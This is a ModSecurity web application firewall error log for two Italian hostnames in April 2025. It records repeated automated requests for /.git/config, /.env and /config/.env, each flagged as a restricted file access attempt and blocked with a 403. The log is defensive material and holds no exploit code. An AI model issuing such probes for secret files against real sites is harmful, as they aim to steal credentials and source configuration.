[Mon Apr 21 23:27:25.734511 2025] [:error] [pid 2617697] [client 88.99.33.29:35676] [client 88.99.33.29] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aAa4PcCkQ10iOGi44lZubgAAAAE"]
[Mon Apr 21 23:27:25.734679 2025] [:error] [pid 2617697] [client 88.99.33.29:35676] [client 88.99.33.29] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aAa4PcCkQ10iOGi44lZubgAAAAE"]
[Tue Apr 22 09:23:06.087451 2025] [:error] [pid 2640383] [client 45.141.215.221:51222] [client 45.141.215.221] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aAdD2gT1ZfkLZ7E1_YaGDAAAAAo"]
[Tue Apr 22 09:23:06.087756 2025] [:error] [pid 2640383] [client 45.141.215.221:51222] [client 45.141.215.221] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aAdD2gT1ZfkLZ7E1_YaGDAAAAAo"]
[Tue Apr 22 09:23:06.087930 2025] [:error] [pid 2640383] [client 45.141.215.221:51222] [client 45.141.215.221] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "aAdD2gT1ZfkLZ7E1_YaGDAAAAAo"]
[Tue Apr 22 18:56:50.671778 2025] [:error] [pid 2644858] [client 93.123.109.108:59819] [client 93.123.109.108] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAfKUv5S5qdfMEPJNdQCHAAAABA"]
[Tue Apr 22 18:56:50.672038 2025] [:error] [pid 2644858] [client 93.123.109.108:59819] [client 93.123.109.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAfKUv5S5qdfMEPJNdQCHAAAABA"]
[Tue Apr 22 18:56:50.672229 2025] [:error] [pid 2644858] [client 93.123.109.108:59819] [client 93.123.109.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAfKUv5S5qdfMEPJNdQCHAAAABA"]
[Wed Apr 23 08:51:34.165066 2025] [:error] [pid 2662055] [client 93.123.109.7:35552] [client 93.123.109.7] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aAiN9v_G3O6Peb0VFu9wFwAAAAM"]
[Wed Apr 23 08:51:34.166331 2025] [:error] [pid 2662055] [client 93.123.109.7:35552] [client 93.123.109.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aAiN9v_G3O6Peb0VFu9wFwAAAAM"]
[Wed Apr 23 08:51:34.166518 2025] [:error] [pid 2662055] [client 93.123.109.7:35552] [client 93.123.109.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aAiN9v_G3O6Peb0VFu9wFwAAAAM"]
[Thu Apr 24 10:59:36.519716 2025] [:error] [pid 2695498] [client 93.123.109.108:52778] [client 93.123.109.108] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAn9eD-uKDfJBL34dn_oDgAAAAE"]
[Thu Apr 24 10:59:36.519958 2025] [:error] [pid 2695498] [client 93.123.109.108:52778] [client 93.123.109.108] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAn9eD-uKDfJBL34dn_oDgAAAAE"]
[Thu Apr 24 10:59:36.520134 2025] [:error] [pid 2695498] [client 93.123.109.108:52778] [client 93.123.109.108] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAn9eD-uKDfJBL34dn_oDgAAAAE"]
[Thu Apr 24 11:39:33.181485 2025] [:error] [pid 2695497] [client 93.123.109.107:51846] [client 93.123.109.107] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAoG1Yz30Bn5fhF9CFq9uQAAAAA"]
[Thu Apr 24 11:39:33.181717 2025] [:error] [pid 2695497] [client 93.123.109.107:51846] [client 93.123.109.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAoG1Yz30Bn5fhF9CFq9uQAAAAA"]
[Thu Apr 24 11:39:33.181902 2025] [:error] [pid 2695497] [client 93.123.109.107:51846] [client 93.123.109.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAoG1Yz30Bn5fhF9CFq9uQAAAAA"]
[Fri Apr 25 09:54:59.118478 2025] [:error] [pid 2716972] [client 93.123.109.107:62139] [client 93.123.109.107] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAs_06aVgsYLhgYx1yfFQAAAAAU"]
[Fri Apr 25 09:54:59.118719 2025] [:error] [pid 2716972] [client 93.123.109.107:62139] [client 93.123.109.107] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAs_06aVgsYLhgYx1yfFQAAAAAU"]
[Fri Apr 25 09:54:59.118898 2025] [:error] [pid 2716972] [client 93.123.109.107:62139] [client 93.123.109.107] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAs_06aVgsYLhgYx1yfFQAAAAAU"]
[Fri Apr 25 15:34:53.152948 2025] [:error] [pid 2716915] [client 93.123.109.105:59844] [client 93.123.109.105] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aAuPfVjdsJyq_v8skpjw4wAAAAE"]
[Fri Apr 25 15:34:53.154467 2025] [:error] [pid 2716915] [client 93.123.109.105:59844] [client 93.123.109.105] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aAuPfVjdsJyq_v8skpjw4wAAAAE"]
[Fri Apr 25 15:34:53.154656 2025] [:error] [pid 2716915] [client 93.123.109.105:59844] [client 93.123.109.105] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aAuPfVjdsJyq_v8skpjw4wAAAAE"]
[Fri Apr 25 15:34:54.127042 2025] [:error] [pid 2725094] [client 93.123.109.105:59852] [client 93.123.109.105] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAuPfnQ1eeAO9okRgCblLQAAAAk"]
[Fri Apr 25 15:34:54.127301 2025] [:error] [pid 2725094] [client 93.123.109.105:59852] [client 93.123.109.105] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAuPfnQ1eeAO9okRgCblLQAAAAk"]
[Fri Apr 25 15:34:54.127465 2025] [:error] [pid 2725094] [client 93.123.109.105:59852] [client 93.123.109.105] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aAuPfnQ1eeAO9okRgCblLQAAAAk"]
[Fri Apr 25 16:50:17.283011 2025] [:error] [pid 2719854] [client 54.224.75.174:40894] [client 54.224.75.174] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aAuhKaBk7-Rf03FnxcCGfAAAAAc"]
[Fri Apr 25 16:50:17.283348 2025] [:error] [pid 2719854] [client 54.224.75.174:40894] [client 54.224.75.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aAuhKaBk7-Rf03FnxcCGfAAAAAc"]
[Fri Apr 25 16:50:17.283526 2025] [:error] [pid 2719854] [client 54.224.75.174:40894] [client 54.224.75.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aAuhKaBk7-Rf03FnxcCGfAAAAAc"]
[Fri Apr 25 20:38:40.146419 2025] [:error] [pid 2725122] [client 93.123.109.105:60228] [client 93.123.109.105] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aAvWsCNFAwjuNSxOXeSkIQAAAAo"]
[Fri Apr 25 20:38:40.146726 2025] [:error] [pid 2725122] [client 93.123.109.105:60228] [client 93.123.109.105] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aAvWsCNFAwjuNSxOXeSkIQAAAAo"]
[Fri Apr 25 20:38:40.146902 2025] [:error] [pid 2725122] [client 93.123.109.105:60228] [client 93.123.109.105] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "aAvWsCNFAwjuNSxOXeSkIQAAAAo"]
[Sun Apr 27 00:24:09.301918 2025] [:error] [pid 2758567] [client 54.224.75.174:43482] [client 54.224.75.174] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aA1dCVriBdTTMbEOD54aCwAAAAE"]
[Sun Apr 27 00:24:09.302197 2025] [:error] [pid 2758567] [client 54.224.75.174:43482] [client 54.224.75.174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aA1dCVriBdTTMbEOD54aCwAAAAE"]
[Sun Apr 27 00:24:09.302395 2025] [:error] [pid 2758567] [client 54.224.75.174:43482] [client 54.224.75.174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aA1dCVriBdTTMbEOD54aCwAAAAE"]
[Sun Apr 27 14:59:02.763647 2025] [:error] [pid 2760972] [client 154.83.103.210:42380] [client 154.83.103.210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aA4qFhtlo-uNY69UwTqivAAAAAM"]
[Sun Apr 27 14:59:02.763918 2025] [:error] [pid 2760972] [client 154.83.103.210:42380] [client 154.83.103.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aA4qFhtlo-uNY69UwTqivAAAAAM"]
[Sun Apr 27 14:59:02.764098 2025] [:error] [pid 2760972] [client 154.83.103.210:42380] [client 154.83.103.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aA4qFhtlo-uNY69UwTqivAAAAAM"]
[Sun Apr 27 14:59:02.784795 2025] [:error] [pid 2760972] [client 154.83.103.210:42380] [client 154.83.103.210] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aA4qFhtlo-uNY69UwTqivQAAAAM"]
[Sun Apr 27 14:59:02.785059 2025] [:error] [pid 2760972] [client 154.83.103.210:42380] [client 154.83.103.210] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aA4qFhtlo-uNY69UwTqivQAAAAM"]
[Sun Apr 27 14:59:02.785235 2025] [:error] [pid 2760972] [client 154.83.103.210:42380] [client 154.83.103.210] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aA4qFhtlo-uNY69UwTqivQAAAAM"]
